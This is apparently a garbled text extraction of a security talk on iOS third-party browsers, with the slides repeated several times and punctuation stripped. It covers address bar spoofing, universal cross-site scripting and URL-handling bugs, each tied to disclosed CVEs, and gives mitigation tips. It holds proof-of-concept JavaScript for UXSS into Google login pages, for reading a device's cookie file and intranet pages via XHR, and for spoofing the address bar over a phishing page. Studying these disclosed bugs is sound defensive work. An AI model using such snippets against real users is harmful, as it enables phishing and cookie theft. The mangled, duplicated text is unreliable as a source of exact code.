bull CVE-2012-2899 UXSS in Google Chrome for iOS
bull hellip
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
UXSS Universal Cross-Site Scripting
CVE-2013-6893UXSS in Mercury Browser
UXSS Universal Cross-Site Scripting
CVE-2013-6893 Mercury UXSS
w = windowopen(lsquoaboutblankrsquo)
mbexec$(WINDOW_ID)[ commandwindowopen target1234 ldquourlaboutblank ]
Mathrandom()
UXSS Universal Cross-Site Scripting
[webView loadRequest hellip ldquoaboutblankrdquo hellip]
cross-frame forgery
CVE-2013-6893 Mercury UXSS
wdocumentwrite(lsquoHirsquo)
mbexec$(WINDOW_ID)[ ldquocommandwindowdocumentwrite target1234 ldquohtmlrdquoHi ]
UXSS Universal Cross-Site Scripting
[webView stringByEvaluatingJavaScriptFromString ldquodocumentwrite(lsquoHirsquo)rdquo]
CVE-2013-6893 Mercury UXSS
Mercury Browser for iOS does not implement same-origin policy restrictions for cross-tab calls Any at all
w = windowopen(lsquohttpsaccountsgooglecom) wdocumentwrite(lsquoltscript src=hellipgtltscriptgtrsquo) hellipand it just works in accountsgooglecom
UXSS Universal Cross-Site Scripting
UXSS Universal Cross-Site Scripting
CVE-2013-7197UXSS in YandexBrowser
UXSS Universal Cross-Site Scripting
CVE-2013-7197 Yandex UXSS
bull Same-origin check implemented on windowopen()
bull Not rechecked on windowdocumentwrite()
bull Redirect child window after windowopen()
UXSS
UXSS Universal Cross-Site Scripting
Bug Bounty-)
CVE-2012-2899UXSS in Google Chrome
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(locationhref)wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURLhref]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(lsquoaboutblankrsquo)wdocumentwrite(hellip)
bull aboutblank is kind of ldquono URLrdquo right
bull [webView loadHTMLStringldquohelliprdquo baseURLnil]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull For baseURL = nilUIWebView loads applewebdata origin Same as file - no same-origin policy access to any web origin and local files
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSSbull w = windowopen(lsquoaboutblankrsquo)
wdocumentwrite( lsquoltscriptgtdocumentwrite(locationhref)ltscriptgtrsquo )
bull applewebdata origin
bull UXSS + local file access (application sandboxjailbreak)
UXSS Universal Cross-Site Scripting
Bug Bounty-)
Safe cross-tab documentwrite
bull w = windowopen(locationhref) wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURL [NSURL hellipldquoaboutblankrdquo]
UXSS Universal Cross-Site Scripting
Safe cross-tab documentwrite
bull iOS8 use WKWebViewUIDelegate webViewcreateWebViewWithConfigurationforNavigationActionwindowFeatures
UXSS Universal Cross-Site Scripting
Other potential paths to applewebdata or file originbull baseURL
[NSURL URLWithStringldquohttpexamplecomrdquo] mdashgt nil
bull CFURLCreateWithString(kCFAllocatorDefault CFSTR(ldquohttpexamplecom) NULL) mdashgt NULL
bull Downloads opened directly from file
UXSS Universal Cross-Site Scripting
Content-Disposition attachmentbull displayed in the origin of hosting site (iOS lt 5)
CVE-2011-3426 Christian Matthies Yoshinori Oota
bull isolated attachment origin (iOS 5 +)
bull documentlocationhref
bull documentreferrer
bull w=windowopen(lsquohttpsrsquo+locationhostname) wdocumentwrite(lsquocustom SOP implementationrsquo)
UXSS Universal Cross-Site Scripting
Content-Typebull textplain
HTML (iOS lt 7) CVE-2013-5151 Ben Toews
bull applicationoctet-stream HTML
bull applicationother filenamehtml
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgta = documentlocationhrefsplit() if(a[0]===file) path = lsquofile+a[3]++a[4]++a[5]++a[6]+rsquo+a[7] path = path+LibraryCookiesCookiesbinarycookies x = new XMLHttpRequest() xopen(GET path false) xsend() alert(xresponseText) ltscriptgt
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgt x = new XMLHttpRequest() xopen(lsquoGET lsquohttpsyourintranet false) xsend() alert(xresponseText)ltscriptgt
UXSS Universal Cross-Site Scripting
ChallengeHijack password autofill
UXSS Universal Cross-Site Scripting
Opening local HTML files safely
bull Open as textplain
bull Content-Security-Policy header HTML5 sandbox
bull baseURL = aboutblank
bull iOS8 WKWebViewconfigurationpreferencesjavaScriptEnabled = false
UXSS Universal Cross-Site Scripting
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
Popups amp URL handling
Popups amp URL handling
bull Browsers rewriting href attributes for target=_blank can be usually tricked into believing navigation was initiated by user
bull ltiframe src=ldquogooglechromeexamplecomrdquogtltiframe src=ldquomercexamplecomrdquogtetc bypass all popup blockers anywayhellip
Popup blockers
Popups amp URL handling
Application(bolted-on)
Native (WebKit)
bull schemedownloadhttpssecuretldvictimdata schemedownloadhttpattackertldREADMEhtml
bull schemeadd-filterurl=
Bridge (internal)
URI schemes
Popups amp URL handling
Registered(external)
CFURL Null Pointer Dereferencebull Any CFURL function that gets NULL as an argument
will cause Null Pointer Dereference
bull Tested with percent encodinghttp http5 http5c etc
bull Example Opera Coast ltscriptgtdocumentlocation = lsquohttp5crsquoltscriptgt
Popups amp URL handling
Opera Coast
Program received signal EXC_BAD_ACCESS Could not access memory
Reason KERN_INVALID_ADDRESS at address 0x00000000
0x2f3e0d76 in CFURLCopyPath()
Popups amp URL handling
bull Special guest star Safari on OS X Mavericksbefore Security Update 2014-02 (CVE-2014-1315)
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
SSLbull By default invalid certificates for iOS UIWebView
https requests are rejected without user interaction
bull This can be changed (eg allowing a user to accept self-signed cert)
bull 14 of tested browsersself-signed SSL certificates are silently accepted
bull In some cases the validation is done for main domain only (eg Opera Coast lt 302)
SSL amp password managers
SSL amp password managers
Password managers
bull JavaScript with privileges of top frame mdashgt passwords not filled for subframes
bull Usually possible to force saving password for another domain (withwithout user interaction)
bull Password filling checks for domain but not always for URL scheme (https vs http)
SSL amp password managers
SSL amp password managers
Summary
bull UIWebViews should be replaced with iOS8 WKWebViews in browser applications
bull Most 3rd party iOS browsers are experimental or side projects built with less attention to detail
bull Mobile device management and other enterprise solutions often include a browser application Did you test it
Mobile Browsers Security iOS
Referencesbull httpsdeveloperapplecomlibraryiosdocumentation
AppleApplicationsReferenceSafariWebContent
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebView_ClassReferenceReferencehtml
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebViewDelegate_ProtocolReferenceReferencehtml
bull httpsdeveloperapplecomlibrarymacdocumentationcorefoundationReferenceCFURLRefReferencereferencehtml
bull httpsdeveloperapplecomlibraryprereleaseiosdocumentationWebKitReferenceWKWebView_Refindexhtml
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompbrowsersec
bull httpwwww3orgTRCSP
bull httpwwwslidesharenetiphonepentestios-application-insecurity
bull httpslabsmwrinfosecuritycomblog20120416adventures-with-ios-uiwebviews
bull httpwwwshmoocomidn
bull httpblogchromiumorg200812security-in-depth-local-web-pageshtml
bull httpresearchmicrosoftcompubs73101guilogicsecuritypdf
bull httpgsstatcountercom
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompchromiumissuesdetailid=146760
bull httpscodegooglecompchromiumissuesdetailid=147625
bull httpscodegooglecompchromiumissuesdetailid=324969
bull httpscodegooglecompchromiumissuesdetailid=326118
bull httpscodegooglecompchromiumissuesdetailid=326125
bull httpscodegooglecompchromiumissuesdetailid=348640
bull httpblogsoperacommobile201405opera-coast-updated-3-02
bull httpwwwf-securecomenweblabs_globalfsc-2014-4
Mobile Browsers Security iOS
References
bull httpbrowser-shreddersblogspotcom
bull httpsiosbrowsr-testscom
Mobile Browsers Security iOS
Questions
Mobile Browsers Security iOS
lukaszpilorzrunicpl pawelwylecialgmailcom
Twitter runicpl h0wlu
Thank you
Mobile Browsers Security iOS
iOS Third-Party Browsers
gt 60 browsers in App Store
UIWebView amp WKWebView
UIWebView amp WKWebView
UIWebView amp WKWebView
UIWebView API
bull loadRequest
bull loadHTMLStringbaseURL
bull loadDataMIMETypetextEncodingNamebaseURL
bull goBackgoForwardstopLoadingreload
bull request (read-only)
UIWebView amp WKWebView
UIWebView APIbull stringByEvaluatingJavaScriptFromString
in the origin of currently loaded requestmainDocumentURL
No access to subframesfrom other domain than
the top document
httpexamplecom
httphiddentld
UIWebView amp WKWebView
JavaScript used to
implement browser features
and to override native functions to bridge them with Objective-C code
UIWebView amp WKWebView
UIWebViewDelegate
bull webViewshouldStartLoadWithRequestnavigationType
bull webViewDidStartLoad
bull webViewDidFinishLoad
bull webViewdidFailLoadWithError
UIWebView amp WKWebView
iOS8 beta WKWebViewbull configurationpreferences
bull configurationuserContentController
bull navigationDelegate
bull UIDelegate
bull URL (KVO)
bull hasOnlySecureContent (KVO)
UIWebView amp WKWebView
Bolted-on by the browsersbull Address bar
bull Multiple tabs
bull Downloads
bull Support for untrusted SSL certificates
bull Autocomplete amp password manager
bull hellip and many more features (safety ratings malware protection cloud integration hellip)
UIWebView amp WKWebView
Testing
bull Inspiration from Browser Security Handbook
bull Retesting previous Mobile Safari bugs
bull ldquoBlack-boxrdquo testing from web perspective review of JavaScript code a bit of reversing debugging
bull Cross-browser test caseshttpsiosbrowsr-testscom
UIWebView amp WKWebView
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
Address Bar Spoofing
Address Bar Spoofing
Address bar spoofing
Address Bar Spoofing
Look-alike
IDN etc
URL trackingdesynchronization
URL tracking desynchronization
bull Navigate to untracked content
bull Initiate navigation interrupt overwrite content
bull Failed navigation
bull Loading loop
bull Lots of other methods (race conditions history hellip)
bull Most of them known for over 10 years (IE Netscape)
Address Bar Spoofing
Address Bar Spoofing Untracked Content
Address Bar Spoofing
Untracked Content
Replace window content with untracked content
documentwrite andor data URIs are usually good candidates
bull w = windowopen(lsquohttpsaccountsgooglecomrsquo) setTimeout(function()wdocumentwrite() hellip)
Address Bar Spoofing
Untracked Content
bull CVE-2013-5152 Mobile Safari Address Bar Spoofingreported in iOS 511 fixed in iOS 7
Address Bar Spoofing
Address Bar Spoofing Init amp Interrupt
Address Bar Spoofing
Init amp InterruptInitialise window with target URL replace with phishing content before it loads
bull w = windowopen(lsquohttpsaccountsgooglecomrsquo) wdocumentwrite(hellip)
Optionally fall-back to native windowopen
bull delete windowopenw = windowopen(lsquohttpsaccountsgooglecomrsquo) wdocumentwrite(hellip)
Address Bar Spoofing
Address Bar Spoofing
Init amp Interruptbull CVE-2013-6895 Kaspersky Safe Browser
bull CVE-2013-6898 F-Secure Safe Browser
bull CVE-2013-6897 Dolphin Browser
bull hellip and 45 of tested browsers
bull Special guest star Google Chrome for Android CVE-2013-6642
Address Bar Spoofing
Bug Bounty-)
Address Bar Spoofing Failed Navigation
Address Bar Spoofing
Failed NavigationIncorrect URL often remains in address bar after navigation errors
bull DNS NXDOMAIN - host not found (httpslogintargettld)
bull TCP port closed (httpswwwtargettld448)
bull SSL errors (httpstargettld)
bull Display phishing page then redirect to ldquoincorrectrdquo URL
bull Mobile Safari before iOS 7 windowfocus() or windowopen()close() allowed suppressing error alerts
Address Bar Spoofing
Address Bar Spoofing Loading loop
Address Bar Spoofing
Loading loopbull HTTP request timeout in iOS browsers is usually
between 1 and 10 minutes
bull Address bar in Mobile Safari and many other iOS browsers is updated on navigation attempt even before an actual connection is made
bull Now we only need to find a target with filtered port 443
bull Or any filtered port because Mobile Safari shows only the hostname part of the URL
Address Bar Spoofing
Loading loop
bull documentwrite(Phishing page here) location = httpsaccountsgooglecom8443setInterval(function() location=httpsaccountsgooglecom8443 hellip)
Address Bar Spoofing
Address Bar Spoofing
Phishing page
Title bar
Address Bar Spoofing
lttitlegthttpswwwapplecomlttitlegt
Address bar tipsbull Display the URL that is currently loaded within
UIWebView not the one you think will be there
bull UIWebViewDelegate Update address bar on each event including webViewdidFailLoadWithError
bull Displaying SSL lock makes sense if there was an actual successful and valid SSL connection Spoofing https URL seems easy donrsquot make it worse by automatically adding SSL lock
bull iOS8 KVO-compliant WKWebViewURL property
Address Bar Spoofing
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
UXSS UniversalCross-Site Scripting
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
XSS enables attackers to inject client-side script into web pages viewed by other users
bypassing same-origin policy
In UXSS the attacker exploits vulnerability in the browser not in the website
(~ httpenwikipediaorgwikiCross-site_scripting)
Famous after PDF UXSS in 2007
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
bull CVE-2013-6893 UXSS in Mercury Browser for iOS
bull CVE-2013-7197 UXSS in YandexBrowser for iOS
bull CVE-2012-2899 UXSS in Google Chrome for iOS
bull hellip
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
UXSS Universal Cross-Site Scripting
CVE-2013-6893UXSS in Mercury Browser
UXSS Universal Cross-Site Scripting
CVE-2013-6893 Mercury UXSS
w = windowopen(lsquoaboutblankrsquo)
mbexec$(WINDOW_ID)[ commandwindowopen target1234 ldquourlaboutblank ]
Mathrandom()
UXSS Universal Cross-Site Scripting
[webView loadRequest hellip ldquoaboutblankrdquo hellip]
cross-frame forgery
CVE-2013-6893 Mercury UXSS
wdocumentwrite(lsquoHirsquo)
mbexec$(WINDOW_ID)[ ldquocommandwindowdocumentwrite target1234 ldquohtmlrdquoHi ]
UXSS Universal Cross-Site Scripting
[webView stringByEvaluatingJavaScriptFromString ldquodocumentwrite(lsquoHirsquo)rdquo]
CVE-2013-6893 Mercury UXSS
Mercury Browser for iOS does not implement same-origin policy restrictions for cross-tab calls Any at all
w = windowopen(lsquohttpsaccountsgooglecom) wdocumentwrite(lsquoltscript src=hellipgtltscriptgtrsquo) hellipand it just works in accountsgooglecom
UXSS Universal Cross-Site Scripting
UXSS Universal Cross-Site Scripting
CVE-2013-7197UXSS in YandexBrowser
UXSS Universal Cross-Site Scripting
CVE-2013-7197 Yandex UXSS
bull Same-origin check implemented on windowopen()
bull Not rechecked on windowdocumentwrite()
bull Redirect child window after windowopen()
UXSS
UXSS Universal Cross-Site Scripting
Bug Bounty-)
CVE-2012-2899UXSS in Google Chrome
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(locationhref)wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURLhref]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(lsquoaboutblankrsquo)wdocumentwrite(hellip)
bull aboutblank is kind of ldquono URLrdquo right
bull [webView loadHTMLStringldquohelliprdquo baseURLnil]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull For baseURL = nilUIWebView loads applewebdata origin Same as file - no same-origin policy access to any web origin and local files
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSSbull w = windowopen(lsquoaboutblankrsquo)
wdocumentwrite( lsquoltscriptgtdocumentwrite(locationhref)ltscriptgtrsquo )
bull applewebdata origin
bull UXSS + local file access (application sandboxjailbreak)
UXSS Universal Cross-Site Scripting
Bug Bounty-)
Safe cross-tab documentwrite
bull w = windowopen(locationhref) wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURL [NSURL hellipldquoaboutblankrdquo]
UXSS Universal Cross-Site Scripting
Safe cross-tab documentwrite
bull iOS8 use WKWebViewUIDelegate webViewcreateWebViewWithConfigurationforNavigationActionwindowFeatures
UXSS Universal Cross-Site Scripting
Other potential paths to applewebdata or file originbull baseURL
[NSURL URLWithStringldquohttpexamplecomrdquo] mdashgt nil
bull CFURLCreateWithString(kCFAllocatorDefault CFSTR(ldquohttpexamplecom) NULL) mdashgt NULL
bull Downloads opened directly from file
UXSS Universal Cross-Site Scripting
Content-Disposition attachmentbull displayed in the origin of hosting site (iOS lt 5)
CVE-2011-3426 Christian Matthies Yoshinori Oota
bull isolated attachment origin (iOS 5 +)
bull documentlocationhref
bull documentreferrer
bull w=windowopen(lsquohttpsrsquo+locationhostname) wdocumentwrite(lsquocustom SOP implementationrsquo)
UXSS Universal Cross-Site Scripting
Content-Typebull textplain
HTML (iOS lt 7) CVE-2013-5151 Ben Toews
bull applicationoctet-stream HTML
bull applicationother filenamehtml
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgta = documentlocationhrefsplit() if(a[0]===file) path = lsquofile+a[3]++a[4]++a[5]++a[6]+rsquo+a[7] path = path+LibraryCookiesCookiesbinarycookies x = new XMLHttpRequest() xopen(GET path false) xsend() alert(xresponseText) ltscriptgt
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgt x = new XMLHttpRequest() xopen(lsquoGET lsquohttpsyourintranet false) xsend() alert(xresponseText)ltscriptgt
UXSS Universal Cross-Site Scripting
ChallengeHijack password autofill
UXSS Universal Cross-Site Scripting
Opening local HTML files safely
bull Open as textplain
bull Content-Security-Policy header HTML5 sandbox
bull baseURL = aboutblank
bull iOS8 WKWebViewconfigurationpreferencesjavaScriptEnabled = false
UXSS Universal Cross-Site Scripting
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
Popups amp URL handling
Popups amp URL handling
bull Browsers rewriting href attributes for target=_blank can be usually tricked into believing navigation was initiated by user
bull ltiframe src=ldquogooglechromeexamplecomrdquogtltiframe src=ldquomercexamplecomrdquogtetc bypass all popup blockers anywayhellip
Popup blockers
Popups amp URL handling
Application(bolted-on)
Native (WebKit)
bull schemedownloadhttpssecuretldvictimdata schemedownloadhttpattackertldREADMEhtml
bull schemeadd-filterurl=
Bridge (internal)
URI schemes
Popups amp URL handling
Registered(external)
CFURL Null Pointer Dereferencebull Any CFURL function that gets NULL as an argument
will cause Null Pointer Dereference
bull Tested with percent encodinghttp http5 http5c etc
bull Example Opera Coast ltscriptgtdocumentlocation = lsquohttp5crsquoltscriptgt
Popups amp URL handling
Opera Coast
Program received signal EXC_BAD_ACCESS Could not access memory
Reason KERN_INVALID_ADDRESS at address 0x00000000
0x2f3e0d76 in CFURLCopyPath()
Popups amp URL handling
bull Special guest star Safari on OS X Mavericksbefore Security Update 2014-02 (CVE-2014-1315)
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
SSLbull By default invalid certificates for iOS UIWebView
https requests are rejected without user interaction
bull This can be changed (eg allowing a user to accept self-signed cert)
bull 14 of tested browsersself-signed SSL certificates are silently accepted
bull In some cases the validation is done for main domain only (eg Opera Coast lt 302)
SSL amp password managers
SSL amp password managers
Password managers
bull JavaScript with privileges of top frame mdashgt passwords not filled for subframes
bull Usually possible to force saving password for another domain (withwithout user interaction)
bull Password filling checks for domain but not always for URL scheme (https vs http)
SSL amp password managers
SSL amp password managers
Summary
bull UIWebViews should be replaced with iOS8 WKWebViews in browser applications
bull Most 3rd party iOS browsers are experimental or side projects built with less attention to detail
bull Mobile device management and other enterprise solutions often include a browser application Did you test it
Mobile Browsers Security iOS
Referencesbull httpsdeveloperapplecomlibraryiosdocumentation
AppleApplicationsReferenceSafariWebContent
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebView_ClassReferenceReferencehtml
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebViewDelegate_ProtocolReferenceReferencehtml
bull httpsdeveloperapplecomlibrarymacdocumentationcorefoundationReferenceCFURLRefReferencereferencehtml
bull httpsdeveloperapplecomlibraryprereleaseiosdocumentationWebKitReferenceWKWebView_Refindexhtml
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompbrowsersec
bull httpwwww3orgTRCSP
bull httpwwwslidesharenetiphonepentestios-application-insecurity
bull httpslabsmwrinfosecuritycomblog20120416adventures-with-ios-uiwebviews
bull httpwwwshmoocomidn
bull httpblogchromiumorg200812security-in-depth-local-web-pageshtml
bull httpresearchmicrosoftcompubs73101guilogicsecuritypdf
bull httpgsstatcountercom
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompchromiumissuesdetailid=146760
bull httpscodegooglecompchromiumissuesdetailid=147625
bull httpscodegooglecompchromiumissuesdetailid=324969
bull httpscodegooglecompchromiumissuesdetailid=326118
bull httpscodegooglecompchromiumissuesdetailid=326125
bull httpscodegooglecompchromiumissuesdetailid=348640
bull httpblogsoperacommobile201405opera-coast-updated-3-02
bull httpwwwf-securecomenweblabs_globalfsc-2014-4
Mobile Browsers Security iOS
References
bull httpbrowser-shreddersblogspotcom
bull httpsiosbrowsr-testscom
Mobile Browsers Security iOS
Questions
Mobile Browsers Security iOS
lukaszpilorzrunicpl pawelwylecialgmailcom
Twitter runicpl h0wlu
Thank you
Mobile Browsers Security iOS
UIWebView amp WKWebView
UIWebView amp WKWebView
UIWebView amp WKWebView
UIWebView API
bull loadRequest
bull loadHTMLStringbaseURL
bull loadDataMIMETypetextEncodingNamebaseURL
bull goBackgoForwardstopLoadingreload
bull request (read-only)
UIWebView amp WKWebView
UIWebView APIbull stringByEvaluatingJavaScriptFromString
in the origin of currently loaded requestmainDocumentURL
No access to subframesfrom other domain than
the top document
httpexamplecom
httphiddentld
UIWebView amp WKWebView
JavaScript used to
implement browser features
and to override native functions to bridge them with Objective-C code
UIWebView amp WKWebView
UIWebViewDelegate
bull webViewshouldStartLoadWithRequestnavigationType
bull webViewDidStartLoad
bull webViewDidFinishLoad
bull webViewdidFailLoadWithError
UIWebView amp WKWebView
iOS8 beta WKWebViewbull configurationpreferences
bull configurationuserContentController
bull navigationDelegate
bull UIDelegate
bull URL (KVO)
bull hasOnlySecureContent (KVO)
UIWebView amp WKWebView
Bolted-on by the browsersbull Address bar
bull Multiple tabs
bull Downloads
bull Support for untrusted SSL certificates
bull Autocomplete amp password manager
bull hellip and many more features (safety ratings malware protection cloud integration hellip)
UIWebView amp WKWebView
Testing
bull Inspiration from Browser Security Handbook
bull Retesting previous Mobile Safari bugs
bull ldquoBlack-boxrdquo testing from web perspective review of JavaScript code a bit of reversing debugging
bull Cross-browser test caseshttpsiosbrowsr-testscom
UIWebView amp WKWebView
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
Address Bar Spoofing
Address Bar Spoofing
Address bar spoofing
Address Bar Spoofing
Look-alike
IDN etc
URL trackingdesynchronization
URL tracking desynchronization
bull Navigate to untracked content
bull Initiate navigation interrupt overwrite content
bull Failed navigation
bull Loading loop
bull Lots of other methods (race conditions history hellip)
bull Most of them known for over 10 years (IE Netscape)
Address Bar Spoofing
Address Bar Spoofing Untracked Content
Address Bar Spoofing
Untracked Content
Replace window content with untracked content
documentwrite andor data URIs are usually good candidates
bull w = windowopen(lsquohttpsaccountsgooglecomrsquo) setTimeout(function()wdocumentwrite() hellip)
Address Bar Spoofing
Untracked Content
bull CVE-2013-5152 Mobile Safari Address Bar Spoofingreported in iOS 511 fixed in iOS 7
Address Bar Spoofing
Address Bar Spoofing Init amp Interrupt
Address Bar Spoofing
Init amp InterruptInitialise window with target URL replace with phishing content before it loads
bull w = windowopen(lsquohttpsaccountsgooglecomrsquo) wdocumentwrite(hellip)
Optionally fall-back to native windowopen
bull delete windowopenw = windowopen(lsquohttpsaccountsgooglecomrsquo) wdocumentwrite(hellip)
Address Bar Spoofing
Address Bar Spoofing
Init amp Interruptbull CVE-2013-6895 Kaspersky Safe Browser
bull CVE-2013-6898 F-Secure Safe Browser
bull CVE-2013-6897 Dolphin Browser
bull hellip and 45 of tested browsers
bull Special guest star Google Chrome for Android CVE-2013-6642
Address Bar Spoofing
Bug Bounty-)
Address Bar Spoofing Failed Navigation
Address Bar Spoofing
Failed NavigationIncorrect URL often remains in address bar after navigation errors
bull DNS NXDOMAIN - host not found (httpslogintargettld)
bull TCP port closed (httpswwwtargettld448)
bull SSL errors (httpstargettld)
bull Display phishing page then redirect to ldquoincorrectrdquo URL
bull Mobile Safari before iOS 7 windowfocus() or windowopen()close() allowed suppressing error alerts
Address Bar Spoofing
Address Bar Spoofing Loading loop
Address Bar Spoofing
Loading loopbull HTTP request timeout in iOS browsers is usually
between 1 and 10 minutes
bull Address bar in Mobile Safari and many other iOS browsers is updated on navigation attempt even before an actual connection is made
bull Now we only need to find a target with filtered port 443
bull Or any filtered port because Mobile Safari shows only the hostname part of the URL
Address Bar Spoofing
Loading loop
bull documentwrite(Phishing page here) location = httpsaccountsgooglecom8443setInterval(function() location=httpsaccountsgooglecom8443 hellip)
Address Bar Spoofing
Address Bar Spoofing
Phishing page
Title bar
Address Bar Spoofing
lttitlegthttpswwwapplecomlttitlegt
Address bar tipsbull Display the URL that is currently loaded within
UIWebView not the one you think will be there
bull UIWebViewDelegate Update address bar on each event including webViewdidFailLoadWithError
bull Displaying SSL lock makes sense if there was an actual successful and valid SSL connection Spoofing https URL seems easy donrsquot make it worse by automatically adding SSL lock
bull iOS8 KVO-compliant WKWebViewURL property
Address Bar Spoofing
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
UXSS UniversalCross-Site Scripting
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
XSS enables attackers to inject client-side script into web pages viewed by other users
bypassing same-origin policy
In UXSS the attacker exploits vulnerability in the browser not in the website
(~ httpenwikipediaorgwikiCross-site_scripting)
Famous after PDF UXSS in 2007
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
bull CVE-2013-6893 UXSS in Mercury Browser for iOS
bull CVE-2013-7197 UXSS in YandexBrowser for iOS
bull CVE-2012-2899 UXSS in Google Chrome for iOS
bull hellip
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
UXSS Universal Cross-Site Scripting
CVE-2013-6893UXSS in Mercury Browser
UXSS Universal Cross-Site Scripting
CVE-2013-6893 Mercury UXSS
w = windowopen(lsquoaboutblankrsquo)
mbexec$(WINDOW_ID)[ commandwindowopen target1234 ldquourlaboutblank ]
Mathrandom()
UXSS Universal Cross-Site Scripting
[webView loadRequest hellip ldquoaboutblankrdquo hellip]
cross-frame forgery
CVE-2013-6893 Mercury UXSS
wdocumentwrite(lsquoHirsquo)
mbexec$(WINDOW_ID)[ ldquocommandwindowdocumentwrite target1234 ldquohtmlrdquoHi ]
UXSS Universal Cross-Site Scripting
[webView stringByEvaluatingJavaScriptFromString ldquodocumentwrite(lsquoHirsquo)rdquo]
CVE-2013-6893 Mercury UXSS
Mercury Browser for iOS does not implement same-origin policy restrictions for cross-tab calls Any at all
w = windowopen(lsquohttpsaccountsgooglecom) wdocumentwrite(lsquoltscript src=hellipgtltscriptgtrsquo) hellipand it just works in accountsgooglecom
UXSS Universal Cross-Site Scripting
UXSS Universal Cross-Site Scripting
CVE-2013-7197UXSS in YandexBrowser
UXSS Universal Cross-Site Scripting
CVE-2013-7197 Yandex UXSS
bull Same-origin check implemented on windowopen()
bull Not rechecked on windowdocumentwrite()
bull Redirect child window after windowopen()
UXSS
UXSS Universal Cross-Site Scripting
Bug Bounty-)
CVE-2012-2899UXSS in Google Chrome
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(locationhref)wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURLhref]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(lsquoaboutblankrsquo)wdocumentwrite(hellip)
bull aboutblank is kind of ldquono URLrdquo right
bull [webView loadHTMLStringldquohelliprdquo baseURLnil]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull For baseURL = nilUIWebView loads applewebdata origin Same as file - no same-origin policy access to any web origin and local files
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSSbull w = windowopen(lsquoaboutblankrsquo)
wdocumentwrite( lsquoltscriptgtdocumentwrite(locationhref)ltscriptgtrsquo )
bull applewebdata origin
bull UXSS + local file access (application sandboxjailbreak)
UXSS Universal Cross-Site Scripting
Bug Bounty-)
Safe cross-tab documentwrite
bull w = windowopen(locationhref) wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURL [NSURL hellipldquoaboutblankrdquo]
UXSS Universal Cross-Site Scripting
Safe cross-tab documentwrite
bull iOS8 use WKWebViewUIDelegate webViewcreateWebViewWithConfigurationforNavigationActionwindowFeatures
UXSS Universal Cross-Site Scripting
Other potential paths to applewebdata or file originbull baseURL
[NSURL URLWithStringldquohttpexamplecomrdquo] mdashgt nil
